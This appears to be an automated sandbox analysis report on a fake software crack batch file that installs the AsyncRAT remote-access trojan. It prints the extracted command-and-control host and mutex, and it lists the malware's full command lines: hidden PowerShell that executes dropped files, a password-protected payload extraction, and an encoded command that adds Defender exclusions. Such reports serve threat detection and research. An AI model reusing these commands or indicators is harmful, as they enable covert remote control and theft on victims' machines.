Analysis
-
max time kernel
594s -
max time network
603s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
-
submitted
25-01-2025 10:42
General
-
Target
lossless scaling/Crack.bat
-
Size
16KB
-
MD5
1f5ea98d27f9d4dfe7da57a12ab5cfb7
-
SHA1
2565fb81fe31c17562106ab046f9d8a8f1d0b3c5
-
SHA256
9dba4747cdba2b31fbbcd2c30ef3c71d2e63ae01a8cd1765d385d065bafa21e5
-
SHA512
3e35d5d4d2212376eeed7be09aaeb6ed200d644ef50122f586a51f130d027f3e54f7af9bd14ba184a0ffe4a13f4cb4dff9e5da776df24f7b710f665aece3dfe4
-
SSDEEP
192:wA7T3nY6jgx4v7UHKtg+NS+7iASgon5ydpakLNfW9FATzSdcO7lgtVhwqgc8Z+Co:nya1TwSaerstRGj
Malware Config
Extracted
asyncrat
A 14
Default
3x3.casacam.net:303
MaterxMutex_Egypt2
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
UAC bypass 3 TTPs 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
-
Executes dropped EXE 6 IoCs
-
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies registry class 1 IoCs
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 31 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lossless scaling\Crack.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
-
-
C:\Windows\system32\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Temp\lossless scaling\\language\en-US" "C:\Users\Public\IObitUnlocker" /E /H /C /I2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "& {Get-Content 'C:\Users\Public\IObitUnlocker\UK.dll' | Out-String | Invoke-Expression}"2⤵
- UAC bypass
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator3⤵
-
-
C:\Users\Public\IObitUnlocker\RAR.exe"C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\3⤵
- Executes dropped EXE
-
-
C:\Users\Public\IObitUnlocker\BR\Font.exe"C:\Users\Public\IObitUnlocker\BR\Font.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\aqtgar.exe"' & exit6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\aqtgar.exe"'7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\aqtgar.exe"C:\Users\Admin\AppData\Local\Temp\aqtgar.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator3⤵
-
-
-
C:\Windows\system32\mode.commode con: cols=80 lines=102⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUA1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exeC:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exeC:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
838B
MD5b2a93166280809b9da482126a28346f6
SHA113705957ad74170698714cc84624196176610f14
SHA256d309ddf505140ba12b7ce857aa7e822f24523b86774d423bf1d74c0cf13ff63d
SHA512924f31c62f16074ebce62227b417b5ba038cbb54f39390a722e2f934c939eed4b47e2d8dcc87727337d8ddef70466be905cd2e94b386a91ab1ff35b86f9c96fb
-
Filesize
3KB
MD522e796539d05c5390c21787da1fb4c2b
SHA155320ebdedd3069b2aaf1a258462600d9ef53a58
SHA2567c6c09f48f03421430d707d27632810414e5e2bf2eecd5eb675fecf8b45a9a92
SHA512d9cc0cb22df56db72a71504bb3ebc36697e0a7a1d2869e0e0ab61349bda603298fe6c667737b79bf2235314fb49b883ba4c5f137d002e273e79391038ecf9c09
-
Filesize
1KB
MD504e5e186de4751967eef3f5d3c17cff3
SHA1da081442582a6e430a63e3a12bac60801807e960
SHA256664661d9515153cbac38a6ed188f5672ff00124acb38a5a381cb9faff8720e82
SHA5121eb22ccb18bf548f9f6004efac5b9781fd751db162190071dcda31ff0814b9935a75ceeb105f9ad83d5d85381defb208e37525c2d6dc47267287bbc3543db625
-
Filesize
15KB
MD5d72c4038f8241d601a283f60bb0f2ee7
SHA1f53a5776e6adb415b810041c951d11df6b0196ff
SHA256b82722163af3e79fa6585dd50e6dbe91f341f3343065dd6e23955588903b80f3
SHA5120d51fc36e862b5af80cc60a05f83a44090d7ee323756fde24b53aa1f9e38cb7df145cf5e96a9ccc87d17c7bde12c343acc543e893b9451700c0b5e2678b1467e
-
Filesize
1KB
MD5f1dd882e18628bc3173525f100778a5a
SHA16e108181c7614325af250bc9de0e65731d2b4df6
SHA25662d61cb4ea1054e83e384180c604d14304d8baebef3a97605fe4ab1edef8423c
SHA5127f4b45e29e39d07e78b0f63b744a5ae9d49036393c58710662248932103b3fde1fba9a04077c6e3ddbd800a12ccc1c9b4aba357f299122dcea369862913b7be1
-
Filesize
156KB
MD56981d94fbcc31ca50551300f5b4a96a3
SHA1e38b3a74f2951f5480fb67acc75d41f3e2b4f70e
SHA2568c19a90379611efc39c3e96529de2e82a99e3e049d36ef6563ec975836e47811
SHA512b94e87c641009ab8206c91ede3e35ab3b65a94fa3be5f4ce7c8a2b17af018f03801086c850427f4d51f4867a3d0a85aaf58ece9fd7f6a36f68df29da430c8d5d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
628KB
MD51d53f5a867dd69486834f81a7a490a2d
SHA14154fe5c8e4b1a6141c8ea21b9f1a13ed7a4d91c
SHA256f804e0bf63f75b3a11c182054a8f02d4f9d2fb182c3a49b105dece388d8d06a1
SHA512769c1e9d9ab34bbd6ff3a0ee06d8e21a64e47861712bf92644a7f9f8d1b035dcf148a6d5d92da16ed82c720b0366e26fb93a0fef91e12a70c1790514bf2fe5c1
-
Filesize
434KB
MD568c9ee084cc409309b116ec6aea890a8
SHA1efd6aab18a08a63b146ad587d1fa08e0bb19bebc
SHA256ef2cbfdfdd874c6c3ea11223b369fbd5f155d20c680ae1e59ac74e6f1bb74a9d
SHA5129809477d42df7bbbaea04da5eda4a4f2ae3114b33541a4efd7003bab339d1c6ddf2f9a61b2ba781c0f5de82b030859c8ac76cbe697b296046227c1dc6b547a25
-
Filesize
181KB
MD5a435e2fb659a3596b017f556b53fa09d
SHA1c9ab6229bf239edac73593e0ffb53c1d9bb21686
SHA256e7f03b61cff5526877ea3f26f613caf5dbdf9006d49b98c906de3051067d7512
SHA512aa3fa16420e66bcdff349ba66791d7849a67d2ae720fdca4b3674ce2a8bffd7a1caae1a306c6533446950b0f8798d6cf7e37ec78ea199252028870fbc742f495
-
Filesize
308B
MD52993b76e0b0ba015caf654881638a0c0
SHA17fbd5f28fb2f6f948cbeb3c4dd5b0672bdfe4bcd
SHA2560e131f595ef67c160de9727d9a92a84b50393e66dd242f330736b916e1bf20a3
SHA512a61e0e7f92f0d78c27939ba21bdda6ff97503adc44e42a4b7eab3c4c1bea8acad4517b90db3430cabc237c2db01e60ab3a2a78e237ae01a896bd09aabba067cb
-
Filesize
629KB
MD5d3e9f98155c0faab869ccc74fb5e8a1e
SHA18e4feaad1d43306fdd8aa66efa443bca7afde710
SHA2563e0fdb5c40336482dacef3496116053d7772a51720900141b3c6f35c6e9b351b
SHA5122760c139ef276f406770675d89fb667f3369a9e1943a6eff2c18f391114018ad6fdce9daf0b499b18081ef22243ef04d74ff21cbd346eb31a1ddbcb79756697d
-
Filesize
457KB
MD5dd3f962ccc2f5b5f34700307e35138f8
SHA190d80df0ef716260a7d4ed466cf40caf966f0969
SHA256e273b5a8cf3d3d37ff676251aa4f41e3726b45b3280f8bf84bf618ca05cca9bb
SHA512619fba6cd9b8aae26db23f9cbd6db4870f969abd198d3fe8551703a1e2c46a9d1fd861f7b9462d82581b322209795c1e00762ebe31e0a1383c8a10df8e4a9eae
-
Filesize
5KB
MD53fffc04611766c3d49b9f0b74752a2b5
SHA1c70e6e3b2cd315e900f6dfdd5828cbf75b903fe5
SHA2567537dd03a875384bc79a7a21811e06ca97de3571631fc20b4b86b26baaafad9d
SHA5123ded3c5712f93eaa75fc9fe9469a02ece5996b6574d63b7b3a5db86db74762631e35aacae519ea3d23862bdaffab5e786696eeb812b0d1ce7f14b78f4539b4d8
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
336KB
-
Filesize
344KB
-
Filesize
304KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
648KB
-
Filesize
992KB
-
Filesize
976KB
-
Filesize
664KB
-
Filesize
48KB
-
Filesize
24KB
-
Filesize
304KB
-
Filesize
32KB
-
Filesize
624KB
-
Filesize
4.8MB
-
Filesize
56KB
-
Filesize
48KB
-
Filesize
120KB
-
Filesize
472KB
-
Filesize
408KB
-
Filesize
88KB
-
Filesize
40KB
-
Filesize
344KB
-
Filesize
456KB
-
Filesize
584KB
-
Filesize
5.6MB
-
Filesize
624KB
-
Filesize
40KB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
408KB
-
Filesize
600KB
-
Filesize
104KB
-
Filesize
6.2MB
-
Filesize
136KB
-
Filesize
216KB